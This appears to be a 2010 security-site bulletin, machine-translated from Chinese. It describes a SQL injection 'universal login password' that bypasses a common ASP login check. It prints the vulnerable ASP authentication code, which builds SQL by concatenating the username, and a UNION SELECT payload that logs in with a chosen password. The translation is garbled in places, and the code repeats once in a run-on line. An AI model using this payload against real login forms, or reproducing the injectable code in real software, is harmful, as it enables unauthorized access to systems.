ASP injection universal login password-vulnerability warning-the black bar safety net

2010-03-29T00:00:00
ID MYHACK58:62201026579
Type myhack58
Reporter 佚名
Modified 2010-03-29T00:00:00

Description

Hackers Handbook sample issue inside, oldjun mentioned a new universal login password. For example, there are many online such login authentication code: program code <% username=trim(Request. Form("username")) password=trim(Request. Form("password")) sql="Select * FROM ad the hackers Handbook sample issue inside, oldjun mentioned a new universal login password. For example, there are many online such login authentication code: Program code

<%

username=trim(Request. Form("username"))

password=trim(Request. Form("password"))

sql="Select * FROM admin Where user='"&username&"'"

Set rs=Server. CreateObject("adodb. recordset")

rs. Open sql,conn,1,1

if rs. eof then

checksysUser=FALSE

else

passwd=trim(rs("pwd"))

if passwd=password then

Session("admin")=username

checksysUser=TRUE

else

checksysUser=FALSE

end if

End if

rs. close

conn. close

if checksysUser=true then

Response. Redirect("main. asp")

else

errmsg="<font color=#FF0000><b>user name input error, please re-input!& lt;/b></font>"

end if

%>

First in the database query the user name corresponding password, and then another and the user input password comparison, resulting in'or'='or'such a universal login password failure.

But if in the above program, the user name input program code

'UNION Select 1,1,1 FROM admin Where "='

Password input 1, Can the successful landing, the principle is very simple, not much to say.

By the way attach oldjun statement:

Program code

'UNION Select 1,1,1 AS pwd FROM admin Where "='